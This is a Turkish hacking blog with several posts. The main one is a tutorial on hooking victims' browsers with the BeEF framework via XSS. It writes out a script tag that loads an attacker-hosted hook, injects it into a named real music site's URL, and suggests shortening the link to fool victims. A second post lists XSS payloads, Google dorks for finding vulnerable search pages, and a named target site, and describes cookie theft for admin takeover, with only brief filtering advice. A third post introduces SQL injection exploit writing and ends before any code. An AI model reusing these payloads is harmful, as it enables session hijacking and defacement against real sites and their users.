hacker etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster
hacker etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster

19 Ocak 2012 Perşembe

BeEF Anlatım

Selamun Aleyküm arkadaşlar.
Uzun bir süredir anlatım yapmıyorum.Aktiflik sıkıntısı yaşıyordum.Vakit buldum ve bu anlatımı yapmak istedim.
Sizlere BeEF uygulamasından bahsedeceğim.BeEF kişinin tarayıcısını kontrol altına almanızı sağlayan içinde fazla özelliği bulunan bir uygulamadır.Nasıl yediririr derseniz onuda bir aşağılarda anlatıcam.Windows ve backtrack üzerinde kullanılabilir.Backtrackta zaten default olarak gelmektedir.Ben BT üzerinden göstereceğim.Benimde sevdiğim güzel bir yöntemdir.

Bt tarafında BeEF kısmında ulaşmak için
BackTrack - Exploitation Tools - Social Engineering Tools - BeEF XSS Framework - beef
Yolunu izliyoruz :)



Karşınıza bu tip html içerisinde bazı kodlar gelecektir.Bunlar siteye gömmek isterseniz diye javascript kodlarıdır.Ben xss üzerinden anlatıma devam edeceğim.

İlk olarak arada bir adres göreceksiniz http://192.168.87.129/beef/ girdiğiniz zaman karşınıza direk beef ekranı gelecektir zaten.



Apply config diyoruz.
Edit 'pw.php' in BeEF root to alter the password
yazıyor yan tarafta.
pw.php dosyasından şifreye bakarsak default olarak BeEFConfigPass girilmiştir.Apply sonrasında finish'e tıklıyoruz.Moduller vs geliyor.



Şimdi xss kısmında kullanacağımız kodu görmek için http://192.168.87.129/beef/hook/example.php linkine bakıyoruz.

<script language='Javascript' src="http://192.168.87.129/beef/hook/beefmagic.js.php'></script>

kodu geldi.Bunu xss olan bir sitede kullanacağız.Örnek şuan benim elimde TTnet müzik bulunmakta.Bu linki kolayca yedirebiliriz.Kodları xss olan kısma yerleştiriyoruz.

www.ttnetmuzik.com.tr/#arama-<script>alert(document.domain)</script>

http://www.ttnetmuzik.com.tr/#arama-<script language='Javascript' src="http://192.168.87.129/beef/hook/beefmagic.js.php'></script>

Bunu tıklanma kısmı kalıyor.Bazen linkler çok uzun geliyor insanlar tıklamadan önce düşünüyor bu gibi durumlarda linkleri kısaltmak için siteler mevcut.Karşı taraf linke tıkladığı zaman zombies kısmında görünecektir..



Örnek karşı tarayıcıdaki kişiye bir mesaj göndermek istiyoruz.O zaman zombies kısmındaki ip adresine bir kere tıklıyoruz seçili hale getiriyoruz ardından standart modul kısmında alert dialog kısmını seçiyoruz.Mesajı yazıyoruz ve send now diyoruz.Ben sanal pc backtrack üzerinden windows'a uyguluyorum bunları...



Standart modul kısmında en alt kısımda raw javascript görmektesiniz.Buda kurbanda javascript kodlarını çalıştırmanıza olanak sağlar.Böylece cookie bilgilerini çekebilirsiniz.gene standart kısmında deface web page ile sayfayı komple değiştirip kendi yazınızı koyabilirsiniz.

Daha bir çok özellik bulunmaktadır.Ben temel şeylerden ve nasıl yapılacağından bahsettim.Biraz kurcalama ile bu işi kolayca başarabilirsiniz.

Hem zaman derim XSS'de iş var ^^

5 Kasım 2011 Cumartesi

What’s happening?

Gördüğüm kadarı ile artık çoğu insan twitter tarafına geçti geçmesede bir twitter açtı.Benim yoktu açmamıştım gereksiz görmüştüm.Baktım ki bir tane açmanın zamanı gelmiş artık.Ve şeytana uyaraktan açtık işte bir adet...

https://twitter.com/#!/MrPaPaRoSSe

1 Eylül 2011 Perşembe

XSS Nedir ki ?


Selamun aleyküm arkadaşlar konumuz xss.Aşağıda belirli başlıklarla bunu açıkladım.xss giriştir...

Xss Nedir ?
İlk olarak xss nedir necidir ondan başlıyalım.Açılımı Cross Site Scripting yani Çapraz Kod
Çalıştırma anlamına gelmektedir.Sitenin herhangi bir yerindeki script kodlarına yerleştirilecek
kodlarla site admin cookielerine ulaşarak sisteme giriş yapabileceğimiz saldırı türüdür.
arama bölümlerinde,haberlerde filan birçok yerde bulunabilir.

XSS Bulmak ?

Açığı bulmak için birçok tool var internette zaten ama programsız nasıl olucak onu anlamak önemli zaten..
Çoğu kişi sadece ekrana adını getiriyor ve bırakıyor buda bir acayipliktir...

Kullanılan 1-2 xss kodu;

<script>alert(document.cookie)</script>
<IMG SRC="javascript:alert('XSS');">
"><script>alert("DarkDevilZ / Mr.PaPaRoSSe")</script>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
vs vs

http://ha.ckers.org/xss.html

Bu sitede farklı xss kodları mevcut kodlar için bu siteyi kullanabilirsiniz.

Xss bulmak için google'da;

inurl:Search.php
inurl:Search.asp
inurl:arama.php
inurl:Arama.asp
inurl:Ara.asp
inurl:Ara.php

gibi aramalar yapabilirsiniz.

Peki açık varmı yokmu nasıl anlıcaz diyorsanız onuda gösterelim google'da bir arama yapalım..
inurl:Search.php

Şimdi böyle bir site rast geldi.

http://www.sinternet.com/search.php


şimdi
"><script>alert(document.cookie)</script>
yazıp enter diyoruz böylece ekrana bakalım birşey gelecekmi gelirse açık vardır...
Şimdi bununla ne yaparız yani xss ile ne yapabiliriz?
Her site sizin daha önce giris yaptığınızı anlamak için bir cookie oluşturur.
Bizde xss ile bu bilgileri çalabilir ve kendi cookie'mizi admininkiyle değiştirebiliriz.(Değiştirme için firefox'un bir eklentisi var ama unuttum :) )
Böylece siteye admin dediğinizde (panelin admin olduğunu farz edin) admin gibi panele giris yapacaksınız.



Açığın Kapatılması?

açık çok basit bir şekilde kapatılabilinir.
; / ? : @ = & <> “ # { } | \\\\\\\\ ^ ~ [ ] ` % ‘
gibi karakterler filtrelenmelidir.

yada sitenin ana dizinindeki .htaccess'e bunlar eklenmeli;

RewriteEngine On
RewriteCond %{QUERY_STRING} base64_encode.*\\\\\\\\(.*\\\\\\\\) [OR]
RewriteCond %{QUERY_STRING} (\\\\\\\\<|<).*script.*(\\\\\\\\>|>) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\\\\\\\\[|\\\\\\\\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\\\\\\\\[|\\\\\\\\%[0-9A-Z]{0,2})
RewriteRule ^(.*)$ index.php [F,L]


Alıntı-Filan değil hea / Mr.PaPaRoSSe / DD'z

22 Ağustos 2011 Pazartesi

Exploit Nasıl Yazılır (webapps)

Piton'ca exploit nasıl yazılır :P

Selamun Aleyküm Arkadaşlar.
İçimden bir ses sürekli anlatım yap diyor bende o sese hep kulak veriyorum.
(Bazıları beni ne kadar anlatım yapmaktan vazgeçirmeyi amaçlasa da...)

Sanırım artık bu exploit işlerine bug bulmalara filan pek önem verilmiyor.Neticede exploit-db 1337day gibi siteler var.Herkes pusuda bekliyor ve ilk yayınlanan exploiti yada açığı kapma yarışı başlıyor ki bunlar yanlış şeyler.Yani orada yayınlanmasını bekleyeceğinize sizler birşey bulmalısınız.Genelde zaten çok önemli şeyleri insanlar paylaşmazlar.Yada işte kullanırlar kullanırlar artık son 1-2 site filan kalır öyle paylaşırlar.Sonuçta artık sizin de bir kendinize haydi adamım başlıyalım deyip bir atak yapmanız lazım.Gidip script'leri indirmeniz incelemeniz lazım.Şöyle bakın 2-3 hafta indirin bir inceleyin daha önce incelenmemiş yada bug bulunmamış yada yeni sürüm bir script'i.Elbet birşeyler bulacaksınız.Ve sonra fark edeceksiniz ki sizin o pusuda bekleyip yayınlayanlara ihtiyacınız kalmamış artık onların size ihtiyacı var.Şunu da belirtelim bir exploit yazarken işte bug bulurken yada bir sistem kodlarken birşeyler yaparken ingilizce çok önemlidir.En azından orta seviye bir ingilizceniz olursa daha iyi ilerleme gösterirsiniz.Yani adamın hiç ingilizcesi yok bu exploiti 5 haftada yazamaz ama sizin var en fazla 1 hafta oda işte 7/24 bu exploit ile uğraşacak haliniz yok arada kapatırsın hack yaparsın canın yazmak istemez vsvs..

Şimdi fazla dağıtmadan konuya gelelim yoksa ben 3-5 sayfa konusurum...
Bizim yazacağımız exploitler daha web tabanlı.Yani onun dışında remote exploitler filan var onların yazılması başka birşey zaten :) (enteresting)

Bizim yazacağımız bir sql(esquel injekşın) exploit'idir...
elimde bulunan bir sql exploit vardı öyle yazık duruyordu bende onun üzerinden anlattım.
Daha önce script'te sql bug nasıl bulunur onu anlatmıştım pek görülmedi yada ilgi gösterilmemiştir belki de kim bilir...